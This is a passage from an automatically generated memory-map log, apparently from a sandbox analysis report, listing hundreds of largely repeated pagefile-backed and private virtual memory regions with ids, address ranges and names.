filename = "" Region: id = 7306 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 7307 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 7308 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 7309 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7310 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7311 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7312 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7313 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7314 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7315 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7316 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7317 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7318 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 7319 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7320 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7321 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7322 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7323 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7324 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7325 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7326 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7327 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7328 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7329 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7330 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7331 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7332 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7333 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7334 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7335 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7336 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7337 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7338 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7339 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7340 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7341 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7342 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7343 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7344 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7345 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7346 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7347 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7348 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7349 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7350 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7351 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7352 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7353 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7354 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7358 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7359 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7360 start_va = 0x2a0000 end_va = 
0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 7361 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 7362 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 7363 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 7364 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7365 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7366 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7367 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7368 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7369 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7370 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7371 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7372 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7373 start_va = 
0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7374 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7375 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7376 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7377 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7378 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7379 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7380 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7381 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7382 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7383 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7384 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7385 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
7386 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7387 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7388 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7389 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7390 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7391 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7392 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7393 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7394 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7395 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7396 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7426 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7427 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = 
"" Region: id = 7428 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7429 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7430 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7431 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7432 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7433 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7434 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7435 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7436 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7437 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7438 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7439 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7440 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 7441 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7442 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7591 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 7592 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 7593 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 7594 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 7595 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7596 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7597 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7598 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7599 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7600 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7601 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7602 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7603 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7604 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7605 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7606 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7607 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7608 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7609 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7610 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7611 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7612 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7613 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7614 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7615 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7616 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7617 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7618 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7619 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7620 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7621 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7622 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7623 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7624 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7625 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7626 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7627 start_va = 0x2a0000 end_va = 
0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7628 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7629 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7631 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7632 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7633 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7634 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7635 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7636 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7637 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7638 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7639 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7640 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7641 start_va = 
0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7642 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7643 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7644 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 7645 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 7646 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 7647 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 7648 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7649 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7650 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7651 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7652 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7653 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7654 
start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7655 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7656 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7657 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7658 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7659 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7660 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7661 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7662 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7663 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7664 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7665 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7666 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 7667 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7668 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7669 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7670 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7671 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7672 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7673 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7674 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7675 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7676 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7677 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7684 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7685 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = 
